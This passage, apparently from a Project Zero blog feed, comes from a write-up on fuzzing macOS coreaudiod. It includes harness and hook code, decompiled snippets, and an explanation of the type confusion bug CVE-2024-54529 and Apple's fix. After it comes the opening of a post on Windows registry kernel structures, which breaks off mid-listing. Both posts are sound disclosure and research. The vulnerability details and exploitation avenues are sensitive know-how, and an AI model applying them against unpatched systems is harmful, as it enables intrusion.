    Armed with a small seed corpus and an input delivery mechanism, the next step was to configure a fuzzer to use the created fuzzing harness and obtain code coverage. I used the excellent Jackalope fuzzer built and maintained by Ivan Fratric. I chose Jackalope primarily for its high level of customizability—it allows easy implementation of custom mutators, instrumentation, and sample delivery. Additionally, I appreciated its seamless usage on macOS, particularly its code coverage capabilities powered by TinyInst. In contrast, I tried and failed to collect code coverage using Frida against system daemons on macOS.

    I used the following command to start a Jackalope fuzzing run:

    $ jackalope -in in/ -out out/ -delivery file -instrument_module CoreAudio -target_module harness -target_method _fuzz -nargs 1 -iterations 1000 -persist -loop -dump_coverage -cmp_coverage -generate_unwind -nthreads 5 -- ./harness -f @@

    Iterate on the Fuzzing Harness

    This harness quickly generated many crashes, a sign I was on the right track. However, I quickly learned that initial crashes are often not indicative of a security bug, but of a design bug in the fuzzing harness itself or an invalid assumption.

    Iteration 1: Target Initialization

    One of the difficulties with my fuzzing approach was that my target function (the Mach message handler) expected the HAL system to be in a specific state to begin receiving Mach messages. By simply calling the library function with my fuzzing harness, these assumptions were broken.

    This caused errors to start popping up. As shown in the diagram below, the harness bypassed much of the bootstrapping functionality the coreaudiod process would normally take care of during startup.

    Two diagrams comparing code execution. The left diagram, labeled "Fuzzer + Harness," shows a single path 1 directly calling "Process Mach Message" within the "CoreAudio Library." The right diagram, labeled "Coreaudiod Native Process," shows multiple steps 1, 2, 3, ..., X before "Process Mach Message" is called in the "CoreAudio Library."

    Code coverage, as well as error messages, can be very helpful in helping determine some of the initialization steps a fuzzing harness is neglecting. For example, I noticed my data flow would always fail early in most Mach message handlers, logging the message Error: there is no system.

    A flowchart of disassembled code execution. One path, highlighted with "We always go this way!", leads to a successful HALS_System::GetInstance call. Another path shows an error message "Error: There is no system" after a call to HALS_Object_SetProperty if a different condition is met.

    It turns out I needed to initialize the HAL System before I could interact correctly with the Mach APIs. In my case, calling the _AudioHardwareStartServer function in my fuzzing harness took care of most of the necessary initialization.

    Iteration 2: API Call Chaining

    My first crack at a fuzzing harness was cool, but it made a pretty large assumption: all accessible Mach message handlers functioned independently of each other. As I quickly learned, this assumption was incorrect. As I ran the fuzzer, error messages like the following one started popping up:

    A terminal window showing log output from mach-send. A line is highlighted with a red box and arrow, pointing to the text "Plist: there is no client" associated with a coreaudiod error.

    The error seemed to indicate the SetPropertyData Mach handler was expecting a client to be registered via a previous Mach message. Clearly, the Mach handlers I was fuzzing were stateful and depended on each other to function properly. My fuzzing harness would need to take this into consideration in order to have any hope of obtaining good code coverage on the target.

    This highlights a common problem in the fuzzing world: most coverage-guided fuzzers accept a single input, (a bunch of bytes) while many things we want to fuzz accept data in a completely different format, such as several arguments of different types, or even several function calls. This Google writeup explains the problem well, as does Ned Williamson’s OffensiveCon Talk from 2019.

    To get around this limitation, we can use a technique I refer to as API Call Chaining, which considers each fuzz input as a stream that can be read from to craft multiple valid inputs. Thus, each fuzzing iteration would be capable of generating multiple Mach messages. This simple but important insight allows a fuzzer to explore the interdependency of separate function calls using the same code-coverage informed input.

    The FuzzedDataProvider class, which is part of LibFuzzer but can be included as a header for use with any fuzzing harness, is a great choice for consuming a fuzz sample and transforming it into a more meaningful data type. Consider the following pseudocode:

    extern "C" int LLVMFuzzerTestOneInput(const uint8_t* data, size_t size) {

        FuzzedDataProvider fuzz_data(data, size); // Initialize FDP

        while (fuzz_data.remaining_bytes() >= MACH_MSG_MIN_SIZE) { // Continue until we've consumed all bytes

            uint32_t msg_id = fuzz_data.ConsumeIntegralInRange<uint32_t>(1010000, 1010062);

            switch (msg_id) {

                case '1010000': {

                    send_XSystem_Open_msg(fuzz_data);

                }

                case '1010001': {

                    send_XSystem_Close_msg(fuzz_data);

                }

                case '1010002': {

                    send_XSystem_GetObjectInfo_msg(fuzz_data);

                }

                ... continued

            } 

        }

    }

    This code transforms a blob of bytes into a mechanism that can repeatedly call APIs with fuzz data in a deterministic manner. What’s more, a coverage-guided fuzzer will be able to explore and identify a series of API calls that improves code coverage. From the fuzzer’s perspective, it is simply modifying an array of bytes, blissfully unaware of the additional complexity happening under the hood.

    For example, my fuzzer quickly identified that most interactions with the audiohald service required a call to the _XSystem_Open message handler to register a client before most APIs could be called. The inputs the fuzzer saved to its corpus naturally reflected this fact over time.

    Iteration 3: Mocking Out Buggy/Unneeded Functionality

    Sometimes coverage plateaus, and a fuzzer struggles to explore new code paths. For example, say we’re fuzzing an HTTP server and it keeps getting stuck because it’s trying to read and parse configuration files on startup. If our focus was on the server’s request parsing and response logic, we might choose to mock out the functionality we don’t care about in order to focus the fuzzer’s code coverage exploration elsewhere.

    In my fuzzing harness’ case, calling the initialization routines was causing my harness to try to register the com.apple.audio.audiohald Mach service with the bootstrap server, which was throwing an error because it was already registered by launchd. Since my harness didn’t need to register the Mach service in order to inject messages, (remember, our harness calls the MIG subsystem directly) I decided to mock out the functionality.

    When dealing with pure C functions, function interposing can be used to easily modify a function’s behavior. In the example below, I declare a new version of the bootstrap_check_in function that just says returns KERN_SUCCESS, effectively nopping it out while telling the caller that it was successful.

    #include <mach/mach.h>

    #include <stdarg.h>

    // Forward declaration for bootstrap_check_in

    kern_return_t bootstrap_check_in(mach_port_t bootstrap_port, const char *service_name, mach_port_t *service_port);

    // Custom implementation of bootstrap_check_in

    kern_return_t custom_bootstrap_check_in(mach_port_t bootstrap_port, const char *service_name, mach_port_t *service_port) {

        // Ensure service_port is non-null and set it to a non-zero value

        if (service_port) {

            *service_port = 1;  // Set to a non-zero value

        }

        return KERN_SUCCESS;  // Return 0 (KERN_SUCCESS)

    }

    // Interposing array for bootstrap_check_in

    __attribute__((used)) static struct {

        const void* replacement;

        const void* replacee;

    } interposers[] __attribute__((section("__DATA,__interpose"))) = {

        { (const void *)custom_bootstrap_check_in, (const void *)bootstrap_check_in }

    };

    In the case of C++ functions, I used TinyInst’s Hook API to modify problematic functionality. In one specific scenario, my fuzzer was crashing the target constantly because the CFRelease function was being called with a NULL pointer. Some further analysis told me that this was a non-security relevant bug where a user’s input, which was assumed to contain a valid plist object, was not properly validated. If the plist object was invalid or NULL, a downstream function call would contain NULL, and an abort would occur.

    A flowchart of disassembled code for a function HALS_SettingsManager::_WriteSetting. Text annotations highlight No Check for NULL Property List before a call to _CFPropertyListCreateDeepCopy. Another annotation points to a jmp _CFRelease instruction, labeled CFRelease" indicating a potential use-after-free or similar memory corruption vulnerability.

    So, I wrote the following TinyInst hook, which checked whether the plist object passed into the function was NULL. If so, my hook returned the function call early, bypassing the buggy code.

    void HALSWriteSettingHook::OnFunctionEntered() {

        printf("HALS_SettingsManager::_WriteSetting Entered\n");

        if (!GetRegister(RDX)) {

            printf("NULL plist passed as argument, returning to prevent NULL CFRelease\n");

            printf("Current $RSP: %p\n", GetRegister(RSP));

            void *return_address;

           

            RemoteRead((void*)GetRegister(RSP), &return_address, sizeof(void *));

            printf("Current return address: %p\n", GetReturnAddress());

            printf("Current $RIP: %p\n", GetRegister(RIP));

            SetRegister(RAX, 0);

            SetRegister(RIP, GetReturnAddress());

            printf("$RIP register is now: %p\n", GetRegister(ARCH_PC));

            SetRegister(RSP, GetRegister(RSP) + 8); // Simulate a ret instruction

            printf("$RSP is now: %p\n", GetRegister(RSP));

        }

    }

    Next, I modified Jackalope to use my instrumentation using the CreateInstrumentation API. That way, my hook was applied during each fuzzing iteration, and the annoying NULL CFRelease calls stopped happening. The output below shows the hook preventing a crash from a NULL plist object passed the troublesome API:

    Instrumented module CoreAudio, code size: 7516156

    Hooking function __ZN11HALS_System13_WriteSettingEP11HALS_ClientPK10__CFStringPKv in module CoreAudio

    HALS_SettingsManager::_WriteSetting Entered

    NULL plist passed as argument, returning to prevent NULL CFRelease

    Current $RSP: 0x7ff7bf83b358

    Current return address: 0x7ff8451e7430

    Current $RIP: 0x7ff84533a675

    $RIP register is now: 0x7ff8451e7430

    $RSP is now: 0x7ff7bf83b360

    Total execs: 6230

    Unique samples: 184 (0 discarded)

    Crashes: 3 (2 unique)

    Hangs: 0

    Offsets: 13550

    Execs/s: 134

    The code to reproduce and build this fuzzer with custom instrumentation can be found here: https://github.com/googleprojectzero/p0tools/tree/master/CoreAudioFuzz/jackalope-modifications

    Iteration 4: Improving Sample Structure

    The great thing about a fuzzing-centric auditing technique is that it highlights knowledge gaps in the code you are auditing. As you address these gaps, you gain a deeper understanding of the structure and constraints of the inputs that your fuzzing harness should generate. These insights enable you to refine your harness to produce more targeted inputs, effectively penetrating deeper code paths and improving overall code coverage. The following subsections highlight examples of how I identified and implemented opportunities to iterate on my fuzzing harness, significantly enhancing its efficiency and effectiveness.

    Message Handler Syntax Checks 

    Code coverage results from fuzzing runs are incredibly telling. I noticed that after running my fuzzer for a few days, it was having trouble exploring past the beginning of most of the Mach message handlers. One simple example is shown below, (explored basic blocks are highlighted in blue) where several comparisons were not being passed , causing the function to error out early on. Here, the rdi register is the incoming Mach message we sent to the handler.

    A flowchart of disassembled code for a function _XIOContext_SetClientControlPort. Several conditional branches are shown, labeled Error Out" leading away from the main execution path. The Rest of Functionality block at the bottom includes a call to HALS_IOContext_SetClientControlPort.

    The comparisons were checking that the Mach message was well formatted, with a message length set to 0x34 and various options set within the message. If it wasn’t, it was discarded.

    With this in mind, I modified my fuzzing harness to set the fields in the Mach messages I sent to the _XIOContext_SetClientControlPort handler such that they passed these conditions. The fuzzer could modify other pieces of the message as it pleased, but since these aspects needed to conform to strict guidelines, I simply hardcoded them.

    These small modifications were the beginning of an input structure I was building for my target. The efficiency of my fuzzing improved astronomically after adding these guidelines to the fuzzer - my code coverage increased by 2000% shortly thereafter.

    Out-of-Line (OOL) Message Data

    I noticed my fuzzing setup started generating tons of crashes from a call to mig_deallocate, which frees a given address. At first, I thought I had found an interesting bug, since I could control the address passed to mig_deallocate:

    I quickly learned, however, that Mach messages can contain various types of Out-of-line (OOL) data. This allows a client to allocate a memory region and place a pointer to it within the Mach message, which will be processed and, in some cases, freed by the message handler. When sending a Mach message with the mach_msg API, the XNU kernel will validate that the memory pointed to by OOL descriptors is properly owned and accessible by the client process.

    I hadn’t found a vulnerability; my fuzzing harness was simply attached to the target at a point downstream which bypassed the normal memory checks that would have been performed by the kernel. To remedy this, I modified my fuzzing harness to support allocating space for OOL data and passing the valid memory address within the Mach messages I fuzzed.

    The Vulnerability

    After many fuzzing harness iterations, lldb “next instruction” commands, and hours spent overheating my MacBook Pro, I had finally begun to acquire an understanding of the CoreAudio framework and generate some meaningful crashes.

    But first, some background knowledge.

    The Hardware Abstraction Layer (HAL)

    The com.apple.audio.audiohald Mach service exposes an interface known as the Hardware Abstraction Layer (HAL). The HAL allows clients to interact with audio devices, plugins, and settings on the operating system, represented in the coreaudiod process as C++ objects of type HALS_Object.

    In order to interact with the HAL, a client must first register itself. There are a few ways to do this, but the simplest is using the _XSystem_Open Mach API. Calling this API will invoke the HALS_System::AddClient method, which uses the Mach message’s audit token to create a client (clnt) HALS_Object to map subsequent requests to that client. The code block below shows an IDA decompilation snippet of the creation of a clnt object.

    v85[0] = v5 != 0;

      v28 = v83[0];

      v29 = 'clnt';

      HALS_Object::HALS_Object((HALS_Object *)v13, 'clnt', 0, (__int64)v83[0], v30);

      *(_QWORD *)v13 = &unk_7FF850E56640;

      *(_OWORD *)(v13 + 72) = 0LL;

      *(_OWORD *)(v13 + 88) = 0LL;

      *(_DWORD *)(v13 + 104) = 1065353216;

    Stepping into the HALS_Object constructor, a mutex is acquired before getting the next available object ID before making a call to HALS_ObjectMap::MapObject.

    void __fastcall HALS_Object::HALS_Object(HALS_Object *this, _BOOL4 a2, unsigned int a3, __int64 a4, HALS_Object *a5)

    {

      unsigned int v5; // r12d

      HALB_Mutex::Locker *v6; // r15

      unsigned int v7; // ebx

      HALS_Object *v8; // rdx

      int v9; // eax

      v5 = a3;

      *(_QWORD *)this = &unk_7FF850E7C200;

      *((_DWORD *)this + 2) = 0;

      *((_DWORD *)this + 3) = HALB_MachPort::CreatePort(0LL, a2, a3);

      *((_WORD *)this + 8) = 257;

      *((_WORD *)this + 10) = 1;

      pthread_once(&HALS_ObjectMap::sObjectInfoListInitialized, HALS_ObjectMap::Initialize);

      v6 = HALS_ObjectMap::sObjectInfoListMutex;

      HALB_Mutex::Lock(HALS_ObjectMap::sObjectInfoListMutex);

      v7 = (unsigned int)HALS_ObjectMap::sNextObjectID;

      LODWORD(HALS_ObjectMap::sNextObjectID) = (_DWORD)HALS_ObjectMap::sNextObjectID + 1;

      HALB_Mutex::Locker::~Locker(v6);

      *((_DWORD *)this + 6) = v7;

      *((_DWORD *)this + 7) = a2;

      if ( !v5 )

        v5 = a2;

      *((_DWORD *)this + 8) = v5;

      if ( a4 )

        v9 = *(_DWORD *)(a4 + 24);

      else

        v9 = 0;

      *((_DWORD *)this + 9) = v9;

      *((_QWORD *)this + 5) = &stru_7FF850E86420;

      *((_BYTE *)this + 48) = 0;

      *((_DWORD *)this + 13) = 0;

      HALS_ObjectMap::MapObject((HALS_ObjectMap *)v7, (__int64)this, v8);

    }

    The HALS_ObjectMap::MapObject function adds the freshly allocated object to a linked list stored on the heap. I wrote a program using the TinyInst Hook API that iterates through each object in the list and dumps its raw contents:

    A terminal window displaying output from a command likely related to debugging or instrumenting CoreAudio. It shows messages like Instrumented module CoreAudio, OnModuleInstrumented: Looks like we made it" and an OBJECT DUMP section with memory addresses and hexadecimal/ASCII data.

    To modify an existing HALS_Object, most of the HAL Mach message handlers use the HALS_ObjectMap::CopyObjectByObjectID function, which accepts an integer ID (parsed from the Mach message’s body) for a given HALS_Object, which it then looks up in the Object Map and returns a pointer to the object.

    For example, here’s a small snippet of the ​_XSystem_GetObjectInfo Mach message handler, which calls the HALS_ObjectMap::CopyObjectByObjectID function before accessing information about the object and returning it.

    HALS_Client::EvaluateSandboxAllowsMicAccess(v5);

      v7 = (HALS_ObjectMap *)HALS_ObjectMap::CopyObjectByObjectID((HALS_ObjectMap *)v3);

      v8 = v7;

      if ( !v7 )

      {

        v13 = __cxa_allocate_exception(0x10uLL);

        *(_QWORD *)v13 = &unk_7FF850E85518;

        v13[2] = 560947818;

        __cxa_throw(v13, (struct type_info *)&`typeinfo for'CAException, CAException::~CAException);

      }

    An Intriguing Crash

    Whenever my fuzzer produced a crash, I always took the time to fully understand the crash’s root cause. Often, the crashes were not security relevant, (i.e. a NULL dereference) but fully understanding the reason behind the crash helped me understand the target better and invalid assumptions I was making with my fuzzing harness. Eventually, when I did identify security relevant crashes, I had a good understanding of the context surrounding them.

    The first indication from my fuzzer that a vulnerability might exist was a memory access violation during an indirect call instruction, where the target address was calculated using an index into the rax register. As shown in the following backtrace, the crash occurred shallowly within the _XIOContext_Fetch_Workgroup_Port Mach message handler.

    A debugger lldb output showing a crash in CoreAudio. The stop reason is EXC_BAD_ACCESS code=EXC_I386_GPFLT. The crashing instruction is a call qword ptr rax + 0x168 within CoreAudio_XIOContext_Fetch_Workgroup_Port. A backtrace bt shows the call stack leading to the crash.

    Further investigating the context of the crash in IDA, I noticed that the rax register triggering the invalid memory access was directly derived from a call to the HALS_ObjectMap::CopyObjectByObjectID function.

    A flowchart of disassembled code showing execution paths. One block includes calls to HALS_Client::EvaluateSandboxAllowsMicAccess and HALS_ObjectMap::CopyObjectByID. Subsequent blocks show calls to HALS_ObjectMap::ReleaseObject if certain conditions are met or branch to a different location loc_7FF813A5A928.

    Specifically, it attempted the following:

    1. Fetch a HALS_Object from the Object Map based on an ID provided in the Mach message
    2. Dereference the address a1 at offset 0x68 of the HALS_Object
    3. Dereference the address a2 at offset 0x0 of a1
    4. Call the function pointer at offset 0x168 of a2

    What Went Wrong?

    The operations leading to the crash indicated that at offset 0x68 of the  HALS_Object it fetched, the code expected a pointer to an object with a vtable. The code would then look up a function within the vtable, which would presumably retrieve the object’s “workgroup port.”

    When the fetched object was of type ioct, (IOContext) everything functioned as normal. However, the test input my fuzzer generated was causing the function to fetch a HALS_Object of a different type, which led to an invalid function call. The following diagram shows how an attacker able to influence the pointer at offset 0x68 of a HALS_Object might hijack control flow.

    A diagram illustrating a vtable exploit. It shows Expected ioct Object and Expected 2nd Object with their vtables pointing to legitimate functions. It contrasts this with an Actual Object where Attacker-Controlled Memory contains a void fake_vtable that redirects a getPort call, via a Malicious vtable containing void doEvil, ultimately leading to a CALL doEvil instead of the expected function.

    This vulnerability class is referred to as a type confusion, where the vulnerable code makes the assumption that a retrieved object or struct is a specific type, but it is possible to provide a different one. The object’s memory layout might be completely different, meaning memory accesses and vtable lookups might occur in the wrong place, or even out of bounds. Type confusion vulnerabilities can be extremely powerful due to their ability to form reliable exploits.

    Affected Functions

    The _XIOContext_Fetch_Workgroup_Port Mach message handler wasn’t the only function that assumed it was dealing with an ioct object without checking the type. The table below shows several other message handlers that suffered from the same issue:

    Mach Message Handler

    Affected Routine

    _XIOContext_Fetch_Workgroup_Port

    _XIOContext_Fetch_Workgroup_Port

    _XIOContext_Start

    ___ZNK14HALS_IOContext22HasEnabledInputStreamsEv_block_invoke

    _XIOContext_StartAtTime

    ___ZNK14HALS_IOContext16GetNumberStreamsEb_block_invoke

    _XIOContext_Start_With_WorkInterval

    ___ZNK14HALS_IOContext22HasEnabledInputStreamsEv_block_invoke

    _XIOContext_SetClientControlPort

    _XIOContext_SetClientControlPort

    _XIOContext_Stop

    _XIOContext_Stop

    Apple did perform proper type checking on some of the Mach message handlers. For example, the _XIOContent_PauseIO message handler, shown below, calls a function that checks whether the fetched object is of type ioct before using it. It is not clear why these checks were implemented in certain areas, but not others.

    A snippet of disassembled code. Key instructions include calls to HALC_ProxyObjectMap_CopyObjectByID, HALB_Info::IsStandardClass, and HALC_ProxyObjectMap::RetainObject. An 'ioct' string is being compared with a memory location.

    The impact of this vulnerability can range from an information leak to control flow hijacking. In this case, since the vulnerable code is performing a function call, an attacker could potentially control the data at the offset read during the type confusion, allowing them to control the function pointer and redirect execution. Alternatively, if the attacker can provide an object smaller than 0x68 bytes, an out-of-bounds read would be possible, paving the way for further exploitation opportunities such as memory corruption or arbitrary code execution.

    Creating a Proof of Concept

    Because my fuzzing harness was connected downstream in the Mach message handling process, it was important to build an end-to-end proof-of-concept that used the mach_msg API to send a Mach message to the vulnerable message handler within coreaudiod. Otherwise, we might have triggered a false positive as we did in the case of the mig_deallocate crash where we thought we had a bug, but were actually just bypassing security checks.

    In this case, however, the bug was triggerable using the mach_msg API, making it a legitimate opportunity for use as a sandbox escape. The proof-of-concept code I put together for triggering this issue on MacOS Sequoia 15.0.1 can be found here.

    It’s worth noting that code running on Apple Silicon uses Pointer Authentication Codes (PACs) , which could make exploitation more difficult. In order to exploit this bug through an invalid vtable call, an attacker would need the ability to sign pointers, which would be possible if the attacker gained native code execution in an Apple-signed process. However, I only analyzed and tested this issue on x86-64 versions of MacOS.

    How Apple Fixed the Issue

    I reported this type confusion vulnerability to Apple on October 9, 2024. It was fixed on December 11, 2024, assigned CVE-2024-54529, and a patch was introduced in MacOS Sequoia 15.2, Sonoma 14.7.2, and Ventura 13.7.2. Interestingly, Apple mentions that the vulnerability allowed for code execution with kernel privileges. That part interested me, since as far as I could tell the execution was only possible as the _coreaudiod group, which was not equivalent to kernel privileges.

    A screenshot of a security advisory for an Audio vulnerability in macOS Sonoma. The impact states An app may be able to execute arbitrary code with kernel privileges. The description notes A logic issue was addressed with improved checks" and credits CVE-2024-54529 to Dillon Franke working with Google Project Zero.

    Apple’s fix was simple: since each HALS Object contains information about its type, the patch adds a check within the affected functions to ensure the fetched object is of type ioct before dereferencing the object and performing a function call.

    A snippet of disassembled code with annotations. Several cmp compare instructions are highlighted with Type Check pointing to comparisons with the string ioct. Further down, a call qword ptr rax+158h instruction is highlighted with Object dereference/function call, indicating a potential point of interest for a vulnerability if the object or function pointer can be controlled.

    You might have noticed how the offset derefenced within the HALS Object is 0x70 in the updated version, but was 0x68 in the vulnerable version. Often, such struct modifications are not security relevant, but will differ based on other bug fixes or added features.

    Recommendations

    To prevent similar type confusion vulnerabilities in the future, Apple should consider modifying the CopyObjectByObjectID function (or any others that make assumptions about an object’s type) to include a type check. This could be achieved by passing the expected object type as an argument and verifying the type of the fetched object before returning it. This approach is similar to how deserialization functions often include a template parameter to ensure type safety.

    Conclusion

    This blog post described my journey into the world of MacOS vulnerability research and fuzzing. I hope I have shown how a knowledge-driven fuzzing approach can allow rapid prototyping and iteration, a deep understanding of the target, and high impact bugs.

    In my next post, I will perform a detailed walkthrough of my experience attempting to exploit CVE-2024-54529.

    • ✇Project Zero
    • The Windows Registry Adventure #6: Kernel-mode objects Google Project Zero
      Posted by Mateusz Jurczyk, Google Project Zero Welcome back to the Windows Registry Adventure! In the previous installment of the series, we took a deep look into the internals of the regf hive format. Understanding this foundational aspect of the registry is crucial, as it illuminates the design principles behind the mechanism, as well as its inherent strengths and weaknesses. The data stored within the regf file represents the definitive state of the hive. Knowing how to parse this data i
       

    The Windows Registry Adventure #6: Kernel-mode objects

    16 de Abril de 2025, 18:19

    Posted by Mateusz Jurczyk, Google Project Zero

    Welcome back to the Windows Registry Adventure! In the previous installment of the series, we took a deep look into the internals of the regf hive format. Understanding this foundational aspect of the registry is crucial, as it illuminates the design principles behind the mechanism, as well as its inherent strengths and weaknesses. The data stored within the regf file represents the definitive state of the hive. Knowing how to parse this data is sufficient for handling static files encoded in this format, such as when writing a custom regf parser to inspect hives extracted from a hard drive. However, for those interested in how regf files are managed by Windows at runtime, rather than just their behavior in isolation, there's a whole other dimension to explore: the multitude of kernel-mode objects allocated and maintained throughout the lifecycle of an active hive. These auxiliary objects are essential for several reasons:

    • To track all currently loaded hives, their properties (e.g., load flags), their memory mappings, and the relationships between them (especially for delta hives overlaid on top of each other).
    • To synchronize access to keys and hives within the multithreaded Windows environment.
    • To cache hive information for faster access compared to direct memory mapping lookups.
    • To integrate the registry with the NT Object Manager and support standard operations (opening/closing handles, setting/querying security descriptors, enforcing access checks, etc.).
    • To manage the state of pending transactions before they are fully committed to the underlying hive.

    To address these diverse requirements, the Windows kernel employs numerous interconnected structures. In this post, we will examine some of the most critical ones, how they function, and how they can be effectively enumerated and inspected using WinDbg. It's important to note that Microsoft provides official definitions only for some registry-related structures through PDB symbols for ntoskrnl.exe. In many cases, I had to reverse-engineer the relevant code to recover structure layouts, as well as infer the types and names of particular fields and enums. Throughout this write-up, I will clearly indicate whether each structure definition is official or reverse-engineered. If you spot any inaccuracies, please let me know. The definitions presented here are primarily derived from Windows Server 2019 with the March 2022 patches (kernel build 10.0.17763.2686), which was the kernel version used for the majority of my registry code analysis. However, over 99% of registry structure definitions appear to be identical between this version and the latest Windows 11, making the information directly applicable to the latest systems as well.

    Hive structures

    Given that hives are the most intricate type of registry object, it's not surprising that their kernel-mode descriptors are equally complex and lengthy. The primary hive descriptor structure in Windows, known as _CMHIVE, spans a substantial 0x12F8 bytes – exceeding 4 KiB, the standard memory page size on x86-family architectures. Contained within _CMHIVE, at offset 0, is another structure of type _HHIVE, which occupies 0x600 bytes, as depicted in the diagram below:

    Diagram depicting the layout of the Windows Registry kernel structure _CMHIVE. It shows the overall _CMHIVE block, marked with a total size of 0x12F8 bytes. Within this block, the first part, from offset 0x0 to 0x600, is labeled as the _HHIVE structure. The remaining portion, from offset 0x600 to 0x12F8, is labeled "Rest of _CMHIVE".

    This relationship mirrors that of other common Windows object pairs, such as _EPROCESS / _KPROCESS and _ETHREAD / _KTHREAD. Because _HHIVE is always allocated as a component of the larger _CMHIVE structure, their pointer types are effectively interchangeable. If you encounter a decompiled access using a _HHIVE* pointer that extends beyond the size of the structure, it almost certainly indicates a reference to a field within the encompassing _CMHIVE object.

    But why are two distinct structures dedicated to representing a single registry hive? While technically not required, this separation likely serves to delineate fields associated with different abstraction layers of the hive. Specifically:

    • _HHIVE manages the low-level aspects of the hive, including the hive header, bins, and cells, as well as in-memory mappings and synchronization state with its on-disk counterpart (e.g., dirty sectors).
    • _CMHIVE handles more abstract information about the hive, such as the cache of security descriptors, pointers to high-level kernel objects like the root Key Control Block (KCB), and the associated transaction resource manager (_CM_RM structure).

    The next subsections will provide a deeper look into the responsibilities and inner workings of these two structures.

    _HHIVE structure overview

    The primary role of the _HHIVE structure is to manage the memory-related state of a hive. This allows higher-level registry code to perform operations such as allocating, freeing, and marking cells as "dirty" without needing to handle the low-level implementation details. The _HHIVE structure comprises 49 top-level members, most of which will be described in larger groups below:

    0: kd> dt _HHIVE

    nt!_HHIVE

       +0x000 Signature        : Uint4B

       +0x008 GetCellRoutine   : Ptr64     _CELL_DATA* 

       +0x010 ReleaseCellRoutine : Ptr64     void 

       +0x018 Allocate         : Ptr64     void* 

       +0x020 Free             : Ptr64     void 

       +0x028 FileWrite        : Ptr64     long 

       +0x030 FileRead         : Ptr64     long 

       +0x038 HiveLoadFailure  : Ptr64 Void

       +0x040 BaseBlock        : Ptr64 _HBASE_BLOCK

       +0x048 FlusherLock      : _CMSI_RW_LOCK

       +0x050 WriterLock       : _CMSI_RW_LOCK

       +0x058 DirtyVector      : _RTL_BITMAP

       +0x068 DirtyCount       : Uint4B

       +0x06c DirtyAlloc       : Uint4B

       +0x070 UnreconciledVector : _RTL_BITMAP

       +0x080 UnreconciledCount : Uint4B

       +0x084 BaseBlockAlloc   : Uint4B

       +0x088 Cluster          : Uint4B

       +0x08c Flat             : Pos 0, 1 Bit

       +0x08c ReadOnly         : Pos 1, 1 Bit

       +0x08c Reserved         : Pos 2, 6 Bits

       +0x08d DirtyFlag        : UChar

       +0x090 HvBinHeadersUse  : Uint4B

       +0x094 HvFreeCellsUse   : Uint4B

       +0x098 HvUsedCellsUse   : Uint4B

       +0x09c CmUsedCellsUse   : Uint4B

       +0x0a0 HiveFlags        : Uint4B

       +0x0a4 CurrentLog       : Uint4B

       +0x0a8 CurrentLogSequence : Uint4B

       +0x0ac CurrentLogMinimumSequence : Uint4B

       +0x0b0 CurrentLogOffset : Uint4B

       +0x0b4 MinimumLogSequence : Uint4B

       +0x0b8 LogFileSizeCap   : Uint4B

       +0x0bc LogDataPresent   : [2] UChar

       +0x0be PrimaryFileValid : UChar

       +0x0bf BaseBlockDirty   : UChar

       +0x0c0 LastLogSwapTime  : _LARGE_INTEGER

       +0x0c8 FirstLogFile     : Pos 0, 3 Bits

       +0x0c8 SecondLogFile    : Pos 3, 3 Bits

       +0x0c8 HeaderRecovered  : Pos 6, 1 Bit

       +0x0c8 LegacyRecoveryIndicated : Pos 7, 1 Bit

       +0x0c8 RecoveryInformationReserved : Pos 8, 8 Bits

       +0x0c8 RecoveryInformation : Uint2B

       +0x0ca LogEntriesRecovered : [2] UChar

       +0x0cc RefreshCount     : Uint4B

       +0x0d0 StorageTypeCount : Uint4B

       +0x0d4 Version          : Uint4B

       +0x0d8 ViewMap          : _HVP_VIEW_MAP

       +0x110 Storage          : [2] _DUAL

    Signature

    Equal to 0xBEE0BEE0, it is a unique signature of the _HHIVE / _CMHIVE structures. It may be useful in digital forensics for identifying these structures in raw memory dumps, and is yet another reference to bees in the Windows registry implementation.

    Function pointers

    Next up, there are six function pointers, initialized in HvHiveStartFileBacked and HvHiveStartMemoryBacked, and pointing at internal kernel handlers for the following operations:

    Pointer name

    Pointer value

    Operation

    GetCellRoutine

    HvpGetCellPaged or HvpGetCellFlat

    Translate cell index to virtual address

    ReleaseCellRoutine

    HvpReleaseCellPaged or HvpReleaseCellFlat

    Release previously translated cell index

    Allocate

    CmpAllocate

    Allocate kernel memory within global registry quota

    Free

    CmpFree

    Free kernel memory within global registry quota

    FileWrite

    CmpFileWrite

    Write data to hive file

    FileRead

    CmpFileRead

    Read data from hive file

    As we can see, these functions provide the basic functionality of operating on kernel memory, cell indexes, and the hive file. In my opinion, the most important of them is GetCellRoutine, whose typical destination, HvpGetCellPaged, performs the cell map walk in order to translate a cell index into the corresponding address within the hive mapping.

    It is natural to think that these function pointers could prove useful for exploitation if an attacker managed to corrupt them through a buffer overflow or a use-after-free condition. That was indeed the case in Windows 10 and earlier, but in Windows 11, these calls are now de-virtualized, and most call sites reference one of HvpGetCellPaged / HvpGetCellFlat and HvpReleaseCellPaged / HvpReleaseCellFlat directly, without referring to the pointers. This is great for security, as it completely eliminates the usefulness of those fields in any offensive scenarios.

    Here's an example of a GetCellRoutine call in Windows 10, disassembled in IDA Pro:

    IDA Pro disassembly view showing assembly code related to the GetCellRoutine call in Windows 10, featuring mov and lea instructions, cross-references to CmSetValueKey, and culminating in a call to __guard_dispatch_icall.

    And the same call in Windows 11:

    IDA Pro disassembly of a GetCellRoutine call implementation in Windows 11. The assembly code shows register setup (mov, lea), a test instruction followed by a conditional jump (jz). Depending on the condition, the code either calls HvlpGetCellFlat and jumps onward, or calls HvlpGetCellPaged. Cross-references to CmSetValueKey are also shown

    Hive load failure information

    This is a pointer to a public _HIVE_LOAD_FAILURE structure, which is passed as the first argument to the SetFailureLocation function every time an error occurs while loading a hive. It can be helpful in tracking which validity checks have failed for a given hive, without having to trace the entire loading process.

    Base block

    A pointer to a copy of the hive header, represented by the _HBASE_BLOCK structure.

    Synchronization locks

    There are two locks with the following purpose:

    • FlusherLock – synchronizes access to the hive between clients changing data inside cells and the flusher thread;
    • WriterLock – synchronizes access to the hive between writers that modify the bin/cell layout.

    They are officially of type _CMSI_RW_LOCK, but they boil down to _EX_PUSH_LOCK, and they are used with standard kernel APIs such as ExAcquirePushLockSharedEx.

    Dirty blocks information

    Between offsets 0x58 and 0x84, _HHIVE stores several data structures representing the state of synchronization between the in-memory and on-disk instances of the hive.

    Hive flags

    First of all, there are two flags at offset 0x8C that indicate if the hive mapping is flat and if the hive is read-only. Secondly, there is a 32-bit HiveFlags member that stores further flags which aren't (as far as I know) included in any public Windows symbols. I have managed to reverse-engineer and infer the meaning of the constants I have observed, resulting in the following enum:

    enum _HV_HIVE_FLAGS

    {

